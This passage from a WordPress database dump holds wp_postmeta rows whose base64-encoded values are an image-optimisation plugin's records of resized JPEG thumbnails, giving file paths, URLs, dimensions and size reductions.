yMDE2XC8wOFwvVkFaTy02Ny1lMTQ3MTYxNjcwNzY5Ni0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctZTE0NzE2MTY3MDc2OTYtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY3LWUxNDcxNjE2NzA3Njk2LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1ODk0LCJpZCI6NTg0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctZTE0NzE2MTY3MDc2OTYtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWUxNDcxNjE2NzA3Njk2LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02Ny1lMTQ3MTYxNjcwNzY5Ni0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTg5NiwiaWQiOjU4NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctZTE0NzE2MTY3MDc2OTYtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWUxNDcxNjE2NzA3Njk2LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02Ny1lMTQ3MTYxNjcwNzY5Ni0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MjY5LCJ0aW1lIjoxNDgzNTg1ODk4LCJpZCI6NTg0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1lMTQ3MTYxNjcwNzY5Ni0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctZTE0NzE2MTY3MDc2OTYtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY3LWUxNDcxNjE2NzA3Njk2LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxMywidGltZSI6MTQ4MzU4NTkwMCwiaWQiOjU4NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctZTE0NzE2MTY3MDc2OTYtMjQ3eDI0NS5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWUxNDcxNjE2NzA3Njk2LTI0N3gyNDUuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIyNDUiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02Ny1lMTQ3MTYxNjcwNzY5Ni0yNDd4MjQ1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTkwMiwiaWQiOjU4NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctZTE0NzE2MTY3MDc2OTYtMzAweDI0NS5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWUxNDcxNjE2NzA3Njk2LTMwMHgyNDUuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIyNDUiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02Ny1lMTQ3MTYxNjcwNzY5Ni0zMDB4MjQ1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTkwNCwiaWQiOjU4NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctZTE0NzE2MTY3MDc2OTYtNDAweDI0NS5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWUxNDcxNjE2NzA3Njk2LTQwMHgyNDUuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiIyNDUiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02Ny1lMTQ3MTYxNjcwNzY5Ni00MDB4MjQ1LmpwZyIsInJlZHVjdGlvbiI6MTIsInRpbWUiOjE0ODM1ODU5MDYsImlkIjo1ODR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30157, 574, 'wpfc_optimisation_reduction', '1174'); 
INSERT INTO `wp_postmeta` VALUES (30158, 574, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by01Mi0xLTEtZTE0NzE2MTcxNjI1NDYuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvLTUyLTEtMS1lMTQ3MTYxNzE2MjU0Ni5qcGciLCJ3aWR0aCI6Mzk3LCJoZWlnaHQiOjIxNywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhem8tNTItMS0xLWUxNDcxNjE3MTYyNTQ2LmpwZyIsInJlZHVjdGlvbiI6MTAyMSwidGltZSI6MTQ4MzU4NTkxMywiaWQiOiI1NzQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem8tNTItMS0xLWUxNDcxNjE3MTYyNTQ2LTM0MHgyMTcuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjoyMTcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by01Mi0xLTEtZTE0NzE2MTcxNjI1NDYtMzQweDIxNy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXpvLTUyLTEtMS1lMTQ3MTYxNzE2MjU0Ni0zNDB4MjE3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTkxNSwiaWQiOjU3NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvLTUyLTEtMS1lMTQ3MTYxNzE2MjU0Ni0yNTB4MjE3LmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjE3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem8tNTItMS0xLWUxNDcxNjE3MTYyNTQ2LTI1MHgyMTcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVmF6by01Mi0xLTEtZTE0NzE2MTcxNjI1NDYtMjUweDIxNy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU5MTcsImlkIjo1NzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by01Mi0xLTEtZTE0NzE2MTcxNjI1NDYtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvLTUyLTEtMS1lMTQ3MTYxNzE2MjU0Ni0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhem8tNTItMS0xLWUxNDcxNjE3MTYyNTQ2LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1OTE5LCJpZCI6NTc0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem8tNTItMS0xLWUxNDcxNjE3MTYyNTQ2LTIyNXgyMTcuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMTcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by01Mi0xLTEtZTE0NzE2MTcxNjI1NDYtMjI1eDIxNy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXpvLTUyLTEtMS1lMTQ3MTYxNzE2MjU0Ni0yMjV4MjE3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTkyMSwiaWQiOjU3NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem8tNTItMS0xLWUxNDcxNjE3MTYyNTQ2LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by01Mi0xLTEtZTE0NzE2MTcxNjI1NDYtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXpvLTUyLTEtMS1lMTQ3MTYxNzE2MjU0Ni0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MTQ4LCJ0aW1lIjoxNDgzNTg1OTIzLCJpZCI6NTc0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by01Mi0xLTEtZTE0NzE2MTcxNjI1NDYtMjQ3eDIxNy5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvLTUyLTEtMS1lMTQ3MTYxNzE2MjU0Ni0yNDd4MjE3LmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMjE3IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhem8tNTItMS0xLWUxNDcxNjE3MTYyNTQ2LTI0N3gyMTcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1OTI1LCJpZCI6NTc0fV0='); 
INSERT INTO `wp_postmeta` VALUES (30159, 569, 'wpfc_optimisation_reduction', '1032'); 
INSERT INTO `wp_postmeta` VALUES (30160, 569, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by01Mi0tZTE0NzE2MTIyMjYyNTMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvLTUyLS1lMTQ3MTYxMjIyNjI1My5qcGciLCJ3aWR0aCI6Mjc0LCJoZWlnaHQiOjExNiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhem8tNTItLWUxNDcxNjEyMjI2MjUzLmpwZyIsInJlZHVjdGlvbiI6NjQ4LCJ0aW1lIjoxNDgzNTg1OTMyLCJpZCI6IjU2OSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by01Mi0tZTE0NzE2MTIyMjYyNTMtMjUweDExNi5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjExNiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvLTUyLS1lMTQ3MTYxMjIyNjI1My0yNTB4MTE2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhem8tNTItLWUxNDcxNjEyMjI2MjUzLTI1MHgxMTYuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1OTM0LCJpZCI6NTY5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem8tNTItLWUxNDcxNjEyMjI2MjUzLTIwMHgxMTYuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoxMTYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by01Mi0tZTE0NzE2MTIyMjYyNTMtMjAweDExNi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXpvLTUyLS1lMTQ3MTYxMjIyNjI1My0yMDB4MTE2LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTkzNiwiaWQiOjU2OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvLTUyLS1lMTQ3MTYxMjIyNjI1My0yMjV4MTE2LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MTE2LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem8tNTItLWUxNDcxNjEyMjI2MjUzLTIyNXgxMTYuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVmF6by01Mi0tZTE0NzE2MTIyMjYyNTMtMjI1eDExNi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU5MzgsImlkIjo1Njl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXpvLTUyLS1lMTQ3MTYxMjIyNjI1My0xMTR4MTE2LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem8tNTItLWUxNDcxNjEyMjI2MjUzLTExNHgxMTYuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMTYiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVmF6by01Mi0tZTE0NzE2MTIyMjYyNTMtMTE0eDExNi5qcGciLCJyZWR1Y3Rpb24iOjM4MCwidGltZSI6MTQ4MzU4NTk0MCwiaWQiOjU2OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhem8tNTItLWUxNDcxNjEyMjI2MjUzLTI0N3gxMTYuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by01Mi0tZTE0NzE2MTIyMjYyNTMtMjQ3eDExNi5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjExNiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXpvLTUyLS1lMTQ3MTYxMjIyNjI1My0yNDd4MTE2LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTk0MiwiaWQiOjU2OX1d'); 
INSERT INTO `wp_postmeta` VALUES (30161, 566, 'wpfc_optimisation_reduction', '1353'); 
INSERT INTO `wp_postmeta` VALUES (30162, 566, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzItMy1lMTQ3MTYxMTE5NjY1Mi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTMtZTE0NzE2MTExOTY2NTIuanBnIiwid2lkdGgiOjQ1MCwiaGVpZ2h0IjoyNTAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvMi0zLWUxNDcxNjExMTk2NjUyLmpwZyIsInJlZHVjdGlvbiI6MTI0MSwidGltZSI6MTQ4MzU4NTk0OCwiaWQiOiI1NjYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTMtZTE0NzE2MTExOTY2NTItMzQweDI1MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvMi0zLWUxNDcxNjExMTk2NjUyLTM0MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdmF6bzItMy1lMTQ3MTYxMTE5NjY1Mi0zNDB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTk1MCwiaWQiOjU2Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvMi0zLWUxNDcxNjExMTk2NjUyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzItMy1lMTQ3MTYxMTE5NjY1Mi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3Zhem8yLTMtZTE0NzE2MTExOTY2NTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU5NTMsImlkIjo1NjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6bzItMy1lMTQ3MTYxMTE5NjY1Mi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTMtZTE0NzE2MTExOTY2NTItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC92YXpvMi0zLWUxNDcxNjExMTk2NjUyLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1OTU1LCJpZCI6NTY2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTMtZTE0NzE2MTExOTY2NTItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvMi0zLWUxNDcxNjExMTk2NjUyLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdmF6bzItMy1lMTQ3MTYxMTE5NjY1Mi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTk1NywiaWQiOjU2Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3Zhem8yLTMtZTE0NzE2MTExOTY2NTItMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvMi0zLWUxNDcxN